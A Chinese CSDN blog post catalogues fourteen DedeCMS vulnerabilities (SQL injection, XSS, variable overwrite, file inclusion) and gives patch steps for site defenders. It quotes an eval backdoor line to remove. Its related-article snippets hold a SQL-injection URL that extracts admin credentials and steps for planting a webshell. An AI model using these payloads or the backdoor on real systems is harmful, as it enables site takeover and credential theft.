dede常见漏洞以及解决方法

最新推荐文章于 2024-08-03 16:43:27 发布
最新推荐文章于 2024-08-03 16:43:27 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: dede安全防毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/forest_fire/article/details/50944222
版权
dede常见漏洞以及解决方法
2013-09-06 09:27:59      我来说两句       作者:尛雷
收藏     dede常见漏洞以及解决方法 - ☆奋力拼搏☆ - 北方的…郎我要投稿

dede的漏洞公认的多,接手这个网站也接触了不少,现在就把几种接触到的或者了解到的漏洞记录下来,让大家可以提高警惕,防止网站被攻击。

1.dede dialog目录下的配置文件漏洞

   如果有能力的同学最好好好研究下这个目录下的文件,漏洞太多了,先只说我遇到的一处
在include/dialog下的config.php第35行

 

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
if ( $cuserLogin ->getUserID() <=0 )
{
     if ( empty ( $adminDirHand ))
     {
         ShowMsg( "<b>提示:需输入后台管理目录才能登录</b><br /><form>请输入后台管理目录名:<input type='hidden' name='gotopage' value='" .urlencode( $dedeNowurl ). "' /><input type='text' name='adminDirHand' value='dede' style='width:120px;' /><input style='width:80px;' type='submit' name='sbt' value='转入登录' /></form>" , "javascript:;" );
         exit ();
     }
     $adminDirHand = HtmlReplace( $adminDirHand , 1);
     $gurl = "../../{$adminDirHand}/login.php?gotopage=" .urlencode( $dedeNowurl );
     echo "<script language='javascript'>location='$gurl';</script>" ;
     exit ();
}

修改方案:$gurl = "../../{$adminDirHand}/login.php?gotopage=".urlencode($dedeNowurl);上面添加如下语句:
$adminDirHand = HtmlReplace($adminDirHand, 1);


2.dede group.php页面sql注入漏洞

   具体在group/global.inc.php中


 $db->SetQuery("SELECT G.groupname,G.groupid,G.des,G.groupimg FROM #@__group_user AS U LEFT JOIN #@__groups AS G ON U.gid=G.groupid WHERE U.uid IN({$_GROUPS['_vars']['mids']}) AND U.isjoin=1 AND U.gid<>$id LIMIT 0,6");

 

$id直接来自用户的输入。应该给$id加过滤

3.dede 5.7版本sql注入漏洞

   漏洞位置:/member/ajax_membergroup.php
   漏洞原因:没有对membergroup变量进行过滤

4.wap跨站攻击

   漏洞文件:wapphp第39行

   解决方式:echo htmlspecialchars($pageBody);

5.dede搜索模块sql注入

   漏洞文件 : plus/search.php文件存在变量覆盖漏洞,导致$typeid能被二次覆盖,产生sql注入漏洞。
  解决方式:官网下载补丁吧.

6.dede 5.6版本任意sql注入漏洞

   原因:形成原因:由于dedecmsv5.6的全局机制可以任意给其赋值,而且高级搜索功能/plus/advancedsearch.php中的$sql变量未初始化,导致高级搜索功能可以绕过模板定义直接执行任意SQL语句。
  解决方法:对高级搜索功能/plus/advancedsearch.php中的$sql变量初始化

7.dede全局变量漏洞:

  漏洞文件:include/common.inc.php
  解决方法:

在 /include/common.inc.php  中
找到注册变量的代码

 

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
foreach (Array( '_GET' , '_POST' , '_COOKIE' ) as $_request )
{
          foreach ($ $_request as $_k => $_v ) ${ $_k } = _RunMagicQuotes( $_v );
}
修改为
foreach (Array( '_GET' , '_POST' , '_COOKIE' ) as $_request )
{
          foreach ($ $_request as $_k => $_v ) {
                     if ( strlen ( $_k )>0 && eregi ( '^(cfg_|GLOBALS)' , $_k ) ){
                             exit ( 'Request var not allow!' );
                    }
                     ${ $_k } = _RunMagicQuotes( $_v );
     }
}




8.dede feedback.php页面漏洞

   原因:DedeCMS的plus\feedback.php中对变量 $typeid未做过滤,导致SQL注入漏洞。
   解决方式:官方有补丁

9.dede变量覆盖漏洞

安装完了删除了install就解决了

10.dede圈子搜索漏洞

漏洞页面:/group/search.php
解决方式:第16行:
1$keyword = htmlspecialchars(addslashes($keyword));

 

11.dede官方源码漏洞

源码文件:include/shopcar.class.php文件第8行:
 解决方式:删除@eval(file_get_contents('php://input'));


12.dede新版本变量覆盖漏洞

 文件include/common.inc.php
 解决方式:
CheckRequest($_REQUEST);
在下面添加
CheckRequest($_COOKIE);

13 .dede文件包含漏洞

  漏洞文件:Include/payment/alipay.php      Include/payment/yeepay.php
    解决方式:官方有补丁

14.dede样式分享XSS漏洞

    漏洞文件plus/bshare.php
    解决方式:

plus目录下的bshare.php文件117行 $uuid = isset($uuid)? $uuid : '';改成 $uuid = isset($uuid)? htmlspecialchars($uuid) : '';

 

北方的刀郎
关注
专栏目录
织梦漏洞修复大全(使用织梦建站,有许多漏洞)现在整理了一些
sy_3714的博客
08-17 2577
文章目录使用织梦建站,阿里云中反馈了许多漏洞dedecms /include/payment/alipay.php支付模块注入漏洞修复方案织梦dedecms安全漏洞之/include/common.inc.php漏洞解决办法dedecms任意文件上传漏洞(select_soft_post.php)织梦cms/include/uploadsafe.inc.php漏洞修复方法 使用织梦建站,阿里云中反馈了许多漏洞 现在给大家整理一下织梦的漏洞 dedecms /include/payment/alipay.ph
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3847
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
DeDeCMS漏洞
最新发布
weixin_53198216的博客
08-03 195
4.在生成下选择更新主页HTML,将主页位置后缀改为php,首页模式选择生成静态,再点击更新主页HTML。2.选择模板下的默认模板管理,找到index.htm。7.打开蚁剑,输入网址和密码点击测试连接,显示成功。6.复制到地址栏访问,没有显示内容证明注入成功。3.对这个文件进行编辑写入一句话木马并保存。5.出现一个更新后的路径。
dedecms 漏洞汇总
热门推荐
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
织梦dede5.8抢先体验版
09-26
在描述中提到,织梦dede5.8的新版本主要在安全性能上有了显著提升,这可能是修复了已知的安全漏洞,增强了对SQL注入、XSS跨站脚本等常见攻击的防护,以保护网站数据的安全。此外,提前体验版本让用户有机会在正式...
dede插件开发教程
04-09
说明安装步骤、使用方法、配置选项以及常见问题的解决方案。 通过这个教程,你将能够开发出自己的dede插件,进一步提升dede CMS的功能性和灵活性。二次开发不仅可以满足个性化的业务需求,还能加深你对dede CMS架构...
dede 5.7软件免登陆接口模块
05-15
dede 5.7软件免登陆接口模块】是一个针对dede CMS(织梦内容管理系统)v5.7版本的特殊功能模块,旨在提供一种无需用户登录即可使用特定功能的解决方案。这个模块对于那些希望在网站上实现无账号操作、简化用户体验...
dede 织梦0day收集 2013
05-14
- **SQL注入**: 是一种常见的Web应用程序安全漏洞,攻击者通过将恶意SQL代码插入到查询语句中,从而获取敏感数据或控制数据库。 #### 织梦CMS简介 织梦CMS(DedeCMS)由长沙特木网络科技有限公司开发,自2004年...
DEDE漏洞利用EXP
06-06
DEDE的EXP利用工具和教程。教程里面有详细的解说。
dede常见漏洞以及解决方法
u011168635的专栏
09-08 1380
dede漏洞公认的多,接手这个网站也接触了不少,现在就把几种接触到的或者了解到的漏洞记录下来,让大家可以提高警惕,防止网站被攻击。 1.dede dialog目录下的配置文件漏洞   如果有能力的同学最好好好研究下这个目录下的文件,漏洞太多了,先只说我遇到的一处 在include/dialog下的config.php第35行     if($cuserL
DedeCMS v5.7 SP2_任意修改前台用户密码漏洞分析
wednesday的博客
07-06 242
首先定位到member/resetpassword.php,代码开头未相关文件的包含操作,然后接受了一个叫dopost和id的变量。 接下来是if选择结构通过参数dopost的值来判断接下来将要进行的操作,如果dopost为空则跳转到resetpassword.html,如果$dopost=="getpwd"则进行验证验证码等等操作,如果$dopost=="safequestion"则可以跳过验证验证码等操作直接开始验证用户输入的问题和答案是否与数据库中查询的一致,问题便从这里开始。...
织梦guestbook.php漏洞,DEDE:织梦漏洞修复(含任意文件上传漏洞与注入漏洞
weixin_39796238的博客
03-12 441
这几天阿里频繁提醒网站有漏洞,搞得我不胜其烦,好吧,我修复还不行吗?搜索之后整理如下,仅供参考(5.7以上版本适用):任意文件上传漏洞修复一、/include/dialog/select_soft_post.php文件,搜索(大概在72行左右)$fullfilename = $cfg_basedir.$activepath.'/'.$filename;修改为if (preg_match('#\.(...
利用DedeCms最新漏洞入侵网站
12-05 1846
     DedeCms是目前网络上比较流行的一款PHP整站程序,中文名为“织梦内容管理系统”。最近,DedeCms出现了一个严重的漏洞,黑客通过漏洞可以得到网站的物理路径,并且能够曝出管理员账户名和密码,最为恐怖的是可以直接向服务器写入Webshell,而不必通过登录网站后台。到底是什么漏洞这么厉害,黑客是如何达到目的的,让我们来一探究竟吧。      漏洞成因      问题出在DedeC...
Dedecms5.7漏洞利用
qq_48732306的博客
11-07 1272
Dedecms5.7渗透测试 Dedecms5.7由于编程的问题,有一个可以直接篡改用户密码的漏洞,一下是复现过程: 一:启动环境: 首先要进行dedecms的安装,其下载地址为:] DeDeCMS 官网 http://www.dedecms.com/ [2]。 不过要安装dedecms还要搭建好服务器,而我选择的是使用warmpserve来搭建的,这个软件包含了apache2,php与mysql数据库,安装了就可以一键运行服务器。 Dedecms的安装包含了两个文件,把uploads那个文件放在warms
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)
末初的CSDN博客
05-18 2496
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
渗透测试实战--dedecms漏洞复现
qq_45070118的博客
08-18 5720
实验设备:一台windows服务器,一台kali,一台windows客户端 在虚拟机WIN7上使用phpstudy搭站(解压文件将文件放置在phpstudy配置文件WWW中),使用物理机进行攻击,WIN7 IP为192.168.10.5 物理机安装jdk,建立java环境,由此来运行菜刀 网页链接是WWW后的路径(http://ip/dedecms/uploads) 根据文件存放位置来定在物理机...
dede漏洞的批量检测
10-27
批量检测dede漏洞方法有多种,以下是一些常见的步骤: 1. 收集目标网站:可以通过搜索引擎、在线资产收集工具等方式,获取大量的dede网站。 2. 确定漏洞版本:dede有多个版本,每个版本可能存在不同的漏洞。针对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北方的刀郎

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值